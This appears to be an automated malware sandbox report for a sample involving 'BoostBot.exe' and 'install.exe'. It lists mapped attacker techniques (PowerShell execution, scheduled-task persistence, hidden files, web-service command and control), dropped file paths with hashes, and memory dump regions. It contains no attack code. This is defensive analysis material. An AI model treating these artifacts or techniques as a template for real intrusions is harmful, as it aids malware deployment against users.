Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

Filesize
338B

MD5
1d006c866d17b413468eb345c4b1f172

SHA1
fb1072d40cb53a0e2e669cb2ff598b527aa1e519

SHA256
92db38da7b3d762851a012e130aae8dca0d066b728d1db450a50a18d19b80b7f

SHA512
a669232b9b6554dc2fafca9a79981a86b92ed0f62cc7a8a86eae7c05a2bd3c35803993ffae482ef779bb8172666eb5e74c795f9de46a9710ab683704fcc8be33

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5E5B0733CDA24F9EF7038FEEB6987C6E

Filesize
556B

MD5
3325251ddda1c27b17dcbf00edb55233

SHA1
7927f6978e2f49c41f63e9bfc527e868a04dd5a5

SHA256
a931af6ebb169136d233269ffb35903b71223e98046740cd177a632eca7816e0

SHA512
2611aad908c306dd80f139181f734ad2ab9db1dd60aad2c1c1658c8709751c5c7d2515434fea6711c955309bebbfc65beb694bf672195ca3d0dd7fccbc3a7fcb

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

Filesize
408B

MD5
32ef9d06a64a21338a80bf5960185147

SHA1
e6b669fd78ef9864dd5ad73be6938c8ceba8d5df

SHA256
86b428682b4af11b16affed40c2c2e33500abbe2c96ba595f53f5addada8b72f

SHA512
6118f0ee89359a50f0d14190293ddfb05f7e6a10e72c7eea9fd37e923a44380e7a5850a7c6d2e82690ccec60460f6b2da6c85d5f8e0816d0dfd57f7a1e320aff

Download Submit
C:\Users\Admin\AppData\Local\Temp\BoostBot.exe

Filesize
409KB

MD5
404ab800bbe49c36bd64d0d73600b59a

SHA1
4c8dff2702fada108f7477ad357067310b584366

SHA256
5465f02f24ee5c1fc9c9c27c86c209eeddc2ed607143e1b76ca9c9d9b7b84154

SHA512
d0ecd88adfd84d9d8e845281e0437368aadf3d1d6fb704d7c7630d1360697471c2a49584f968eeebd5b435f11af9ce3d06327f1835fa5d07a140f22c0f95fc11

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gtjilp5v.5pf.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\install.exe

Filesize
162KB

MD5
152e3f07bbaf88fb8b097ba05a60df6e

SHA1
c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

SHA256
a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

SHA512
2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

Download Submit
C:\Users\Admin\AppData\Local\Temp\vmuThGHW6X5Z.bat

Filesize
283B

MD5
a26c9cf4b9a415fa02abba086aa79fe5

SHA1
1a3bd310b564fb61eebe9712cdeb3fc94d5da449

SHA256
8ae3636e977df9ac271e2841207ca8f865d677db916eae1ce899ffe41e4a0033

SHA512
9f7ca0c575a657ac8df896dee61061a608545101b4d6fbfad5a38c5653837ed9598d722adb00dffec8e7b316d60d63d019ae8dbae0dce78326d801e9afdc4dc3

Download Submit
C:\Users\Admin\AppData\Roaming\$SXR-LOGS\05-12-~1

Filesize
224B

MD5
5044bb154e5472417b8e55113795701d

SHA1
c867d5f7de597362ead6621bdf403942f2b3d8e6

SHA256
daa75f9b85f1273c03627f85a9adcde33fabe2ee81d376b573ffffcb3458be77

SHA512
993f7fd335e5921e5f1c6b8b34535208a205e4b3d66c52c9ba1273ce66147fbe47f41dec81245fc831cae3abcbabb087b6d3ca9f4a5f107f888b6c94bcfef5b7

Download Submit
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187

Filesize
412B

MD5
a5062ac1b198f7a89c9f6bfe09b12ac1

SHA1
84291a5b9a6a16e1bfc306fd2157145c7537b126

SHA256
6f3e629683bd89a7e1c8b17fae90e79aeb9ca9a2731b668dfd8108643e53d035

SHA512
946afca66280f55aab76feedab8627bb9bdb592ddcdf309f72b9dffae4b5998a11b0291ce6eba8676d8569367c3c3ed1e3ab5b7ff91a4c3b1152d528425c6403

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

Filesize
3KB

MD5
56efdb5a0f10b5eece165de4f8c9d799

SHA1
fa5de7ca343b018c3bfeab692545eb544c244e16

SHA256
6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

SHA512
91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
efe0903424c927d3611f8d8acd078b79

SHA1
22fda4e644f8fa0908493f40b930b1dff1755356

SHA256
79fc6c6c41514007fa27978e5313312789718489126594f603a4a325153114d6

SHA512
8de645327a416095eae442471a8b4f0b27c60dd424545ebb9f9708a412b6f7d0635ef3069e1663db3dd2bfe5882040c25a1af10d12a2eed4bf8340fd401f8de9

Download Submit
memory/608-139-0x000001938DF00000-0x000001938DF2B000-memory.dmp

Filesize
172KB

Download
memory/608-133-0x000001938DF00000-0x000001938DF2B000-memory.dmp

Filesize
172KB

Download
memory/608-132-0x000001938DF00000-0x000001938DF2B000-memory.dmp

Filesize
172KB

Download
memory/608-131-0x000001938DED0000-0x000001938DEF5000-memory.dmp

Filesize
148KB

Download
memory/608-140-0x00007FFC97D40000-0x00007FFC97D50000-memory.dmp

Filesize
64KB

Download
memory/660-151-0x00007FFC97D40000-0x00007FFC97D50000-memory.dmp

Filesize
64KB

Download
memory/660-144-0x0000011F9DC40000-0x0000011F9DC6B000-memory.dmp

Filesize
172KB

Download
memory/660-150-0x0000011F9DC40000-0x0000011F9DC6B000-memory.dmp

Filesize
172KB

Download
memory/744-155-0x000001B7989B0000-0x000001B7989DB000-memory.dmp

Filesize
172KB

Download
memory/744-161-0x000001B7989B0000-0x000001B7989DB000-memory.dmp

Filesize
172KB

Download
memory/744-162-0x00007FFC97D40000-0x00007FFC97D50000-memory.dmp

Filesize
64KB

Download
memory/928-172-0x000001A1AF590000-0x000001A1AF5BB000-memory.dmp

Filesize
172KB

Download
memory/928-173-0x00007FFC97D40000-0x00007FFC97D50000-memory.dmp

Filesize
64KB

Download
memory/928-166-0x000001A1AF590000-0x000001A1AF5BB000-memory.dmp

Filesize
172KB

Download
memory/1012-177-0x000002A3511C0000-0x000002A3511EB000-memory.dmp

Filesize
172KB

Download
memory/4168-94-0x0000000006DA0000-0x0000000006DAA000-memory.dmp

Filesize
40KB

Download
memory/4488-15-0x0000016E9B030000-0x0000016E9B052000-memory.dmp

Filesize
136KB

Download
memory/4488-16-0x00007FFCBB3D0000-0x00007FFCBBDBC000-memory.dmp

Filesize
9.9MB

Download
memory/4488-20-0x00007FFCBB3D0000-0x00007FFCBBDBC000-memory.dmp

Filesize
9.9MB

Download
memory/4488-10-0x00007FFCBB3D3000-0x00007FFCBB3D4000-memory.dmp

Filesize
4KB

Download
memory/4488-19-0x0000016E9B1E0000-0x0000016E9B256000-memory.dmp

Filesize
472KB

Download
memory/4488-52-0x00007FFCBB3D0000-0x00007FFCBBDBC000-memory.dmp

Filesize
9.9MB

Download
memory/4840-57-0x0000000006360000-0x0000000006372000-memory.dmp

Filesize
72KB

Download
memory/4840-58-0x0000000006750000-0x000000000678E000-memory.dmp

Filesize
248KB

Download
memory/4840-53-0x0000000000D30000-0x0000000000D9C000-memory.dmp

Filesize
432KB

Download
memory/4840-54-0x0000000005B60000-0x000000000605E000-memory.dmp

Filesize
5.0MB

Download
memory/4840-55-0x0000000005660000-0x00000000056F2000-memory.dmp

Filesize
584KB

Download
memory/4840-56-0x0000000005800000-0x0000000005866000-memory.dmp

Filesize
408KB

Download
memory/4932-104-0x00007FFCD7CB0000-0x00007FFCD7E8B000-memory.dmp

Filesize
1.9MB

Download
memory/4932-105-0x00007FFCD5A00000-0x00007FFCD5AAE000-memory.dmp

Filesize
696KB

Download
memory/4932-103-0x0000022030720000-0x000002203074A000-memory.dmp

Filesize
168KB

Download
memory/5000-108-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/5000-109-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/5000-128-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/5000-107-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/5000-106-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/5000-122-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/5000-125-0x00007FFCD7CB0000-0x00007FFCD7E8B000-memory.dmp

Filesize
1.9MB

Download
memory/5000-126-0x00007FFCD5A00000-0x00007FFCD5AAE000-memory.dmp

Filesize
696KB

Download